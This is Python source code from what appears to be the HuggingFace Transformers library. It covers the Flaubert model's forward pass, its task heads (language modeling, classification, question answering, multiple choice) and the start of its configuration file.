def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.attentions[layer].prune_heads(heads)
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
langs: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
lengths: Optional[torch.LongTensor] = None,
cache: Optional[Dict[str, torch.FloatTensor]] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, BaseModelOutput]:
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# removed: src_enc=None, src_len=None
if input_ids is not None:
bs, slen = input_ids.size()
else:
bs, slen = inputs_embeds.size()[:-1]
device = input_ids.device if input_ids is not None else inputs_embeds.device
if lengths is None:
if input_ids is not None:
lengths = (input_ids != self.pad_index).sum(dim=1).long()
else:
lengths = torch.tensor([slen] * bs, device=device)
# mask = input_ids != self.pad_index
# check inputs
assert lengths.size(0) == bs
assert lengths.max().item() <= slen
# input_ids = input_ids.transpose(0, 1) # batch size as dimension 0
# assert (src_enc is None) == (src_len is None)
# if src_enc is not None:
# assert self.is_decoder
# assert src_enc.size(0) == bs
# generate masks
mask, attn_mask = get_masks(slen, lengths, self.causal, padding_mask=attention_mask)
# if self.is_decoder and src_enc is not None:
# src_mask = torch.arange(src_len.max(), dtype=torch.long, device=lengths.device) < src_len[:, None]
# Setting the position-ids to the registered buffer in constructor, it helps
# when tracing the model without passing position-ids, solves
# isues similar to issue #5664
if position_ids is None:
if hasattr(self, "position_ids"):
position_ids = self.position_ids[:, :slen]
position_ids = position_ids.expand((bs, slen))
else:
position_ids = torch.arange(slen, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).expand((bs, slen))
else:
assert position_ids.size() == (bs, slen) # (slen, bs)
# position_ids = position_ids.transpose(0, 1)
# langs
if langs is not None:
assert langs.size() == (bs, slen) # (slen, bs)
# langs = langs.transpose(0, 1)
# Prepare head mask if needed
head_mask = self.get_head_mask(head_mask, self.config.n_layers)
# do not recompute cached elements
if cache is not None and input_ids is not None:
_slen = slen - cache["slen"]
input_ids = input_ids[:, -_slen:]
position_ids = position_ids[:, -_slen:]
if langs is not None:
langs = langs[:, -_slen:]
mask = mask[:, -_slen:]
attn_mask = attn_mask[:, -_slen:]
# embeddings
if inputs_embeds is None:
inputs_embeds = self.embeddings(input_ids)
tensor = inputs_embeds + self.position_embeddings(position_ids).expand_as(inputs_embeds)
if langs is not None and self.use_lang_emb and self.config.n_langs > 1:
tensor = tensor + self.lang_embeddings(langs)
if token_type_ids is not None:
tensor = tensor + self.embeddings(token_type_ids)
tensor = self.layer_norm_emb(tensor)
tensor = nn.functional.dropout(tensor, p=self.dropout, training=self.training)
tensor *= mask.unsqueeze(-1).to(tensor.dtype)
# transformer layers
hidden_states = () if output_hidden_states else None
attentions = () if output_attentions else None
for i in range(self.n_layers):
# LayerDrop
dropout_probability = random.uniform(0, 1)
if self.training and (dropout_probability < self.layerdrop):
continue
if output_hidden_states:
hidden_states = hidden_states + (tensor,)
# self attention
if not self.pre_norm:
attn_outputs = self.attentions[i](
tensor,
attn_mask,
cache=cache,
head_mask=head_mask[i],
output_attentions=output_attentions,
)
attn = attn_outputs[0]
if output_attentions:
attentions = attentions + (attn_outputs[1],)
attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
tensor = tensor + attn
tensor = self.layer_norm1[i](tensor)
else:
tensor_normalized = self.layer_norm1[i](tensor)
attn_outputs = self.attentions[i](tensor_normalized, attn_mask, cache=cache, head_mask=head_mask[i])
attn = attn_outputs[0]
if output_attentions:
attentions = attentions + (attn_outputs[1],)
attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
tensor = tensor + attn
# encoder attention (for decoder only)
# if self.is_decoder and src_enc is not None:
# attn = self.encoder_attn[i](tensor, src_mask, kv=src_enc, cache=cache)
# attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
# tensor = tensor + attn
# tensor = self.layer_norm15[i](tensor)
# FFN
if not self.pre_norm:
tensor = tensor + self.ffns[i](tensor)
tensor = self.layer_norm2[i](tensor)
else:
tensor_normalized = self.layer_norm2[i](tensor)
tensor = tensor + self.ffns[i](tensor_normalized)
tensor *= mask.unsqueeze(-1).to(tensor.dtype)
# Add last hidden state
if output_hidden_states:
hidden_states = hidden_states + (tensor,)
# update cache length
if cache is not None:
cache["slen"] += tensor.size(1)
# move back sequence length to dimension 0
# tensor = tensor.transpose(0, 1)
if not return_dict:
return tuple(v for v in [tensor, hidden_states, attentions] if v is not None)
return BaseModelOutput(last_hidden_state=tensor, hidden_states=hidden_states, attentions=attentions)
@add_start_docstrings(
"""
The Flaubert Model transformer with a language modeling head on top (linear layer with weights tied to the input
embeddings).
""",
FLAUBERT_START_DOCSTRING,
)
# Copied transformers.models.xlm.modeling_xlm.XLMWithLMHeadModel with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertWithLMHeadModel(FlaubertPreTrainedModel):
_keys_to_ignore_on_load_missing = ["pred_layer.proj.weight"]
def __init__(self, config):
super().__init__(config)
self.transformer = FlaubertModel(config)
self.pred_layer = FlaubertPredLayer(config)
# Initialize weights and apply final processing
self.post_init()
def get_output_embeddings(self):
return self.pred_layer.proj
def set_output_embeddings(self, new_embeddings):
self.pred_layer.proj = new_embeddings
def prepare_inputs_for_generation(self, input_ids, **kwargs):
mask_token_id = self.config.mask_token_id
lang_id = self.config.lang_id
effective_batch_size = input_ids.shape[0]
mask_token = torch.full((effective_batch_size, 1), mask_token_id, dtype=torch.long, device=input_ids.device)
input_ids = torch.cat([input_ids, mask_token], dim=1)
if lang_id is not None:
langs = torch.full_like(input_ids, lang_id)
else:
langs = None
return {"input_ids": input_ids, "langs": langs}
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=MaskedLMOutput,
config_class=_CONFIG_FOR_DOC,
mask="<special1>",
)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
langs: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
lengths: Optional[torch.Tensor] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, MaskedLMOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
`labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100`
are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]`
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
output = transformer_outputs[0]
outputs = self.pred_layer(output, labels) # (loss, logits) or (logits,) depending on if labels are provided.
if not return_dict:
return outputs + transformer_outputs[1:]
return MaskedLMOutput(
loss=outputs[0] if labels is not None else None,
logits=outputs[0] if labels is None else outputs[1],
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
@add_start_docstrings(
"""
Flaubert Model with a sequence classification/regression head on top (a linear layer on top of the pooled output)
e.g. for GLUE tasks.
""",
FLAUBERT_START_DOCSTRING,
)
# Copied transformers.models.xlm.modeling_xlm.XLMForSequenceClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForSequenceClassification(FlaubertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.config = config
self.transformer = FlaubertModel(config)
self.sequence_summary = SequenceSummary(config)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=SequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
langs: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
lengths: Optional[torch.Tensor] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, SequenceClassifierOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
output = transformer_outputs[0]
logits = self.sequence_summary(output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
@add_start_docstrings(
"""
Flaubert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_xlm.XLMForTokenClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForTokenClassification(FlaubertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.transformer = FlaubertModel(config)
self.dropout = nn.Dropout(config.dropout)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TokenClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
langs: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
lengths: Optional[torch.Tensor] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, TokenClassifierOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.transformer(
input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[1:]
return ((loss,) + output) if loss is not None else output
return TokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Flaubert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_xlm.XLMForQuestionAnsweringSimple with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForQuestionAnsweringSimple(FlaubertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.transformer = FlaubertModel(config)
self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=QuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
langs: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
lengths: Optional[torch.Tensor] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
start_positions: Optional[torch.Tensor] = None,
end_positions: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, QuestionAnsweringModelOutput]:
r"""
start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = transformer_outputs[0]
logits = self.qa_outputs(sequence_output)
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1).contiguous()
end_logits = end_logits.squeeze(-1).contiguous()
total_loss = None
if start_positions is not None and end_positions is not None:
# If we are on multi-GPU, split add a dimension
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
# sometimes the start/end positions are outside our model inputs, we ignore these terms
ignored_index = start_logits.size(1)
start_positions = start_positions.clamp(0, ignored_index)
end_positions = end_positions.clamp(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
if not return_dict:
output = (start_logits, end_logits) + transformer_outputs[1:]
return ((total_loss,) + output) if total_loss is not None else output
return QuestionAnsweringModelOutput(
loss=total_loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
@add_start_docstrings(
"""
Flaubert Model with a beam-search span classification head on top for extractive question-answering tasks like
SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
FLAUBERT_START_DOCSTRING,
)
@dataclass
# Copied from transformer.models.xlm.modeling_xlm.XLMForQuestionAnsweringOutput with XLM->Flaubert
class FlaubertForQuestionAnsweringOutput(ModelOutput):
"""
Base class for outputs of question answering models using a `SquadHead`.
Args:
loss (`torch.FloatTensor` of shape `(1,)`, *optional*, returned if both `start_positions` and `end_positions` are provided):
Classification loss as the sum of start token, end token (and is_impossible if provided) classification
losses.
start_top_log_probs (`torch.FloatTensor` of shape `(batch_size, config.start_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
Log probabilities for the top config.start_n_top start token possibilities (beam-search).
start_top_index (`torch.LongTensor` of shape `(batch_size, config.start_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
Indices for the top config.start_n_top start token possibilities (beam-search).
end_top_log_probs (`torch.FloatTensor` of shape `(batch_size, config.start_n_top * config.end_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
Log probabilities for the top `config.start_n_top * config.end_n_top` end token possibilities
(beam-search).
end_top_index (`torch.LongTensor` of shape `(batch_size, config.start_n_top * config.end_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
Indices for the top `config.start_n_top * config.end_n_top` end token possibilities (beam-search).
cls_logits (`torch.FloatTensor` of shape `(batch_size,)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
Log probabilities for the `is_impossible` label of the answers.
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
loss: Optional[torch.FloatTensor] = None
start_top_log_probs: Optional[torch.FloatTensor] = None
start_top_index: Optional[torch.LongTensor] = None
end_top_log_probs: Optional[torch.FloatTensor] = None
end_top_index: Optional[torch.LongTensor] = None
cls_logits: Optional[torch.FloatTensor] = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
# Copied from transformer.models.xlm.modeling_xlm.XLMForQuestionAnswering with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForQuestionAnswering(FlaubertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.transformer = FlaubertModel(config)
self.qa_outputs = SQuADHead(config)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=FlaubertForQuestionAnsweringOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
langs: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
lengths: Optional[torch.Tensor] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
start_positions: Optional[torch.Tensor] = None,
end_positions: Optional[torch.Tensor] = None,
is_impossible: Optional[torch.Tensor] = None,
cls_index: Optional[torch.Tensor] = None,
p_mask: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, FlaubertForQuestionAnsweringOutput]:
r"""
start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
is_impossible (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels whether a question has an answer or no answer (SQuAD 2.0)
cls_index (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the classification token to use as input for computing plausibility of the
answer.
p_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Optional mask of tokens which can't be in answers (e.g. [CLS], [PAD], ...). 1.0 means token should be
masked. 0.0 mean token is not masked.
Returns:
Example:
```python
>>> from transformers import XLMTokenizer, XLMForQuestionAnswering
>>> import torch
>>> tokenizer = XLMTokenizer.from_pretrained("xlm-mlm-en-2048")
>>> model = XLMForQuestionAnswering.from_pretrained("xlm-mlm-en-2048")
>>> input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(
... 0
... ) # Batch size 1
>>> start_positions = torch.tensor([1])
>>> end_positions = torch.tensor([3])
>>> outputs = model(input_ids, start_positions=start_positions, end_positions=end_positions)
>>> loss = outputs.loss
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
output = transformer_outputs[0]
outputs = self.qa_outputs(
output,
start_positions=start_positions,
end_positions=end_positions,
cls_index=cls_index,
is_impossible=is_impossible,
p_mask=p_mask,
return_dict=return_dict,
)
if not return_dict:
return outputs + transformer_outputs[1:]
return FlaubertForQuestionAnsweringOutput(
loss=outputs.loss,
start_top_log_probs=outputs.start_top_log_probs,
start_top_index=outputs.start_top_index,
end_top_log_probs=outputs.end_top_log_probs,
end_top_index=outputs.end_top_index,
cls_logits=outputs.cls_logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
@add_start_docstrings(
"""
Flaubert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformer.models.xlm.modeling_xlm.XLMForMultipleChoice with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForMultipleChoice(FlaubertPreTrainedModel):
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.transformer = FlaubertModel(config)
self.sequence_summary = SequenceSummary(config)
self.logits_proj = nn.Linear(config.num_labels, 1)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(
FLAUBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=MultipleChoiceModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
attention_mask: Optional[torch.Tensor] = None,
langs: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
lengths: Optional[torch.Tensor] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, MultipleChoiceModelOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the multiple choice classification loss. Indices should be in `[0, ...,
num_choices-1]` where `num_choices` is the size of the second dimension of the input tensors. (See
`input_ids` above)
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]
input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None
attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None
token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None
position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None
langs = langs.view(-1, langs.size(-1)) if langs is not None else None
inputs_embeds = (
inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
if inputs_embeds is not None
else None
)
if lengths is not None:
logger.warning(
"The `lengths` parameter cannot be used with the Flaubert multiple choice models. Please use the "
"attention mask instead."
)
lengths = None
transformer_outputs = self.transformer(
input_ids=input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
output = transformer_outputs[0]
logits = self.sequence_summary(output)
logits = self.logits_proj(logits)
reshaped_logits = logits.view(-1, num_choices)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(reshaped_logits, labels)
if not return_dict:
output = (reshaped_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return MultipleChoiceModelOutput(
loss=loss,
logits=reshaped_logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 11,706 | src/transformers/models/flaubert/configuration_flaubert.py | # coding=utf-8
# Copyright 2019-present CNRS, Facebook Inc. and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Flaubert configuration"""
from collections import OrderedDict
from typing import Mapping
from ...configuration_utils import PretrainedConfig
from ...onnx import OnnxConfig
from ...utils import logging
logger = logging.get_logger(__name__)
FLAUBERT_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"flaubert/flaubert_small_cased": "https://huggingface.co/flaubert/flaubert_small_cased/resolve/main/config.json",
"flaubert/flaubert_base_uncased": "https://huggingface.co/flaubert/flaubert_base_uncased/resolve/main/config.json",
"flaubert/flaubert_base_cased": "https://huggingface.co/flaubert/flaubert_base_cased/resolve/main/config.json",
"flaubert/flaubert_large_cased": "https://huggingface.co/flaubert/flaubert_large_cased/resolve/main/config.json",
}
class FlaubertConfig(PretrainedConfig):
"""
This is the configuration class to store the configuration of a [`FlaubertModel`] or a [`TFFlaubertModel`]. It is
used to instantiate a FlauBERT model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the FlauBERT
[flaubert/flaubert_base_uncased](https://huggingface.co/flaubert/flaubert_base_uncased) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
pre_norm (`bool`, *optional*, defaults to `False`):
Whether to apply the layer normalization before or after the feed forward layer following the attention in
each layer (Vaswani et al., Tensor2Tensor for Neural Machine Translation. 2018)
layerdrop (`float`, *optional*, defaults to 0.0):
Probability to drop layers during training (Fan et al., Reducing Transformer Depth on Demand with
Structured Dropout. ICLR 2020)
vocab_size (`int`, *optional*, defaults to 30145):
Vocabulary size of the FlauBERT model. Defines the number of different tokens that can be represented by
the `inputs_ids` passed when calling [`FlaubertModel`] or [`TFFlaubertModel`].
emb_dim (`int`, *optional*, defaults to 2048):
Dimensionality of the encoder layers and the pooler layer.
n_layer (`int`, *optional*, defaults to 12):
Number of hidden layers in the Transformer encoder.
n_head (`int`, *optional*, defaults to 16):
Number of attention heads for each attention layer in the Transformer encoder.
dropout (`float`, *optional*, defaults to 0.1):
The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
attention_dropout (`float`, *optional*, defaults to 0.1):
The dropout probability for the attention mechanism
gelu_activation (`bool`, *optional*, defaults to `True`):
Whether or not to use a *gelu* activation instead of *relu*.
sinusoidal_embeddings (`bool`, *optional*, defaults to `False`):
